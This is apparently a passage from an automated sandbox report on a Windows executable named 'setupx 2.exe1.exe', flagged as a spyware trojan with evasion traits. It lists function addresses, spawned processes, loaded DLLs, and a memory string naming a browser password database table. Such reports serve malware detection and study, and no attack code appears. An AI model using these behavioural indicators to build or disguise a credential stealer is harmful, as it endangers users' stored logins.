Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00171A00	2_2_00171A00
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00198230	2_2_00198230
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00183A20	2_2_00183A20
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00153A50	2_2_00153A50
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00127240	2_2_00127240
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00168A70	2_2_00168A70
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00143A90	2_2_00143A90
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00145290	2_2_00145290
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001382B0	2_2_001382B0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001812B0	2_2_001812B0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00187AB0	2_2_00187AB0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00137AA0	2_2_00137AA0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00158AA0	2_2_00158AA0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001922CA	2_2_001922CA
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001522F0	2_2_001522F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00128310	2_2_00128310
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0013B310	2_2_0013B310
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00127B00	2_2_00127B00
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0012A300	2_2_0012A300
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0016130F	2_2_0016130F
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00147320	2_2_00147320
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00161320	2_2_00161320
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00137B50	2_2_00137B50
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0016A350	2_2_0016A350
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00170350	2_2_00170350
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0016EB40	2_2_0016EB40
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00149360	2_2_00149360
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00130B90	2_2_00130B90
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0013DB80	2_2_0013DB80
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00177BB0	2_2_00177BB0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00131BA0	2_2_00131BA0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0013E3A0	2_2_0013E3A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001553A0	2_2_001553A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001693D0	2_2_001693D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0014ABF0	2_2_0014ABF0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0015ABF0	2_2_0015ABF0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001893E0	2_2_001893E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00134C10	2_2_00134C10
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0013D410	2_2_0013D410
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00153410	2_2_00153410
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00142C00	2_2_00142C00
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00181C00	2_2_00181C00
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00134430	2_2_00134430
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00130430	2_2_00130430
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00173430	2_2_00173430
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00132450	2_2_00132450
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00145450	2_2_00145450
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0013EC70	2_2_0013EC70
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00153C70	2_2_00153C70
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00166460	2_2_00166460
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00164CB0	2_2_00164CB0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001254D0	2_2_001254D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0017BCC0	2_2_0017BCC0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001784C0	2_2_001784C0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0018A4C0	2_2_0018A4C0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00133510	2_2_00133510
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00149D00	2_2_00149D00
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00179500	2_2_00179500
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0017FD00	2_2_0017FD00
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00129D30	2_2_00129D30
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00136530	2_2_00136530
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00143530	2_2_00143530
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0015FD20	2_2_0015FD20
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0012CD50	2_2_0012CD50
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0015B560	2_2_0015B560
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00183D60	2_2_00183D60
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001A5592	2_2_001A5592
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00142D80	2_2_00142D80
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0015DD80	2_2_0015DD80
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0015C5A0	2_2_0015C5A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00128DD0	2_2_00128DD0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0015F5D0	2_2_0015F5D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00157DD0	2_2_00157DD0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0015DDD9	2_2_0015DDD9
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001455C0	2_2_001455C0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0014B5F0	2_2_0014B5F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00167DF0	2_2_00167DF0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00130DE0	2_2_00130DE0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0012C610	2_2_0012C610
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00140E10	2_2_00140E10
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00187E10	2_2_00187E10
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00130620	2_2_00130620
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0014FE20	2_2_0014FE20
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00169650	2_2_00169650
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00184640	2_2_00184640
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0012DE60	2_2_0012DE60
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00189E60	2_2_00189E60
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00129690	2_2_00129690
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0012E690	2_2_0012E690
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00175690	2_2_00175690
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00162E80	2_2_00162E80
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001216B0	2_2_001216B0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00145EB0	2_2_00145EB0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00163EA0	2_2_00163EA0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001376C0	2_2_001376C0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0015AEC0	2_2_0015AEC0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0012B6F0	2_2_0012B6F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001466F0	2_2_001466F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0015D6E0	2_2_0015D6E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001586E0	2_2_001586E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0016AEE0	2_2_0016AEE0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0012BF10	2_2_0012BF10
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001A3718	2_2_001A3718
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00142F10	2_2_00142F10
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0012A700	2_2_0012A700
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00133F20	2_2_00133F20
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00141F50	2_2_00141F50
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00139740	2_2_00139740
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00166F90	2_2_00166F90
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0017FF90	2_2_0017FF90
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00146FC0	2_2_00146FC0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00172FC0	2_2_00172FC0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001707F0	2_2_001707F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001227E0	2_2_001227E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0043805F	3_2_0043805F
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0040B860	3_2_0040B860
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0044F060	3_2_0044F060
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_004461D0	3_2_004461D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00417AC0	3_2_00417AC0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0041CAA0	3_2_0041CAA0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0044E2B0	3_2_0044E2B0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00429320	3_2_00429320
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0040D440	3_2_0040D440
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0044FD20	3_2_0044FD20
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00445E00	3_2_00445E00
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00421EC0	3_2_00421EC0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0041BED0	3_2_0041BED0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00430EF0	3_2_00430EF0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00415EA5	3_2_00415EA5
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0042D782	3_2_0042D782
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00401040	3_2_00401040
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0043B049	3_2_0043B049
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00420851	3_2_00420851
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0044E850	3_2_0044E850
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00430070	3_2_00430070
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0043E030	3_2_0043E030
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0042E0D0	3_2_0042E0D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0041209E	3_2_0041209E
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0043D8A0	3_2_0043D8A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00425960	3_2_00425960
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00447960	3_2_00447960
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00441100	3_2_00441100
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0043C91A	3_2_0043C91A
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00447120	3_2_00447120
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0042C93A	3_2_0042C93A
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0042A1D0	3_2_0042A1D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_004219EE	3_2_004219EE
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0043C1A8	3_2_0043C1A8
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00408A60	3_2_00408A60
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00432273	3_2_00432273
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0041B210	3_2_0041B210
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0040A230	3_2_0040A230
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00402AD0	3_2_00402AD0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_004572E4	3_2_004572E4
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0040BAF0	3_2_0040BAF0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0042134F	3_2_0042134F
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00428350	3_2_00428350
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00434330	3_2_00434330
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00427B37	3_2_00427B37
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_004413D0	3_2_004413D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0043E3E0	3_2_0043E3E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_004373E4	3_2_004373E4
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0042D3BF	3_2_0042D3BF
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0044EC40	3_2_0044EC40
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0041C444	3_2_0041C444
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00409450	3_2_00409450
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00430451	3_2_00430451
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0044D460	3_2_0044D460
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00443C6D	3_2_00443C6D
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00433C00	3_2_00433C00
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0042E422	3_2_0042E422
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00429C20	3_2_00429C20
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_004034D0	3_2_004034D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_004454E0	3_2_004454E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0040C4F0	3_2_0040C4F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0043848D	3_2_0043848D
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00423C9E	3_2_00423C9E
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00437CB9	3_2_00437CB9
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0040CD40	3_2_0040CD40
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00425D60	3_2_00425D60
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00407D70	3_2_00407D70
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00440D70	3_2_00440D70
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0044D570	3_2_0044D570
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0043805F	3_2_0043805F
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0041FD10	3_2_0041FD10
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00416D20	3_2_00416D20
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00447DE2	3_2_00447DE2
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0042DDF0	3_2_0042DDF0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00446D80	3_2_00446D80
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0044D589	3_2_0044D589
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0044D58B	3_2_0044D58B
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00402590	3_2_00402590
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_004255A0	3_2_004255A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0044A640	3_2_0044A640
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00432E5D	3_2_00432E5D
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0043266C	3_2_0043266C
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00403E70	3_2_00403E70
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0041EE70	3_2_0041EE70
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0044D608	3_2_0044D608
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00438E0F	3_2_00438E0F
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0044461C	3_2_0044461C
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00408ED0	3_2_00408ED0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_004316FF	3_2_004316FF
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0040E6A0	3_2_0040E6A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00445740	3_2_00445740
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00404752	3_2_00404752
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0041E75B	3_2_0041E75B
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0044FF60	3_2_0044FF60
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0041F779	3_2_0041F779
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0044D730	3_2_0044D730
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_0044D7E0	3_2_0044D7E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00425FA0	3_2_00425FA0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 3_2_00410FB0	3_2_00410FB0

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: String function: 0018DE10 appears 97 times
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: String function: 0019607C appears 44 times
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: String function: 0019AE24 appears 34 times
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: String function: 0041B200 appears 98 times
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: String function: 0040B230 appears 39 times

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6724 -s 692

Source: setupx 2.exe1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: setupx 2.exe1.exe	Static PE information: Section: .bss ZLIB complexity 1.0003282335069446
Source: setupx 2.exe1.exe	Static PE information: Section: .bss ZLIB complexity 1.0003282335069446

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/6@1/1

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Code function: 3_2_004461D0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_004461D0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6724

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\c3cd5441-fce9-4321-9e5a-7707b94c0ea6

Jump to behavior

Source: setupx 2.exe1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: setupx 2.exe1.exe, 00000003.00000003.1015092021.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1014425820.0000000003298000.00000004.00000800.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1039114100.0000000003278000.00000004.00000800.00020000.00000000.sdmp, setupx 2.exe1.exe, 00000003.00000003.1039476683.000000000326A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: setupx 2.exe1.exe	Virustotal: Detection: 48%
Source: setupx 2.exe1.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

File read: C:\Users\user\Desktop\setupx 2.exe1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\setupx 2.exe1.exe "C:\Users\user\Desktop\setupx 2.exe1.exe"
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Process created: C:\Users\user\Desktop\setupx 2.exe1.exe "C:\Users\user\Desktop\setupx 2.exe1.exe"
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Process created: C:\Users\user\Desktop\setupx 2.exe1.exe "C:\Users\user\Desktop\setupx 2.exe1.exe"
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6724 -s 692
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Process created: C:\Users\user\Desktop\setupx 2.exe1.exe "C:\Users\user\Desktop\setupx 2.exe1.exe"	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Process created: C:\Users\user\Desktop\setupx 2.exe1.exe "C:\Users\user\Desktop\setupx 2.exe1.exe"	Jump to behavior

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Section loaded: sspicli.dll	Jump to behavior
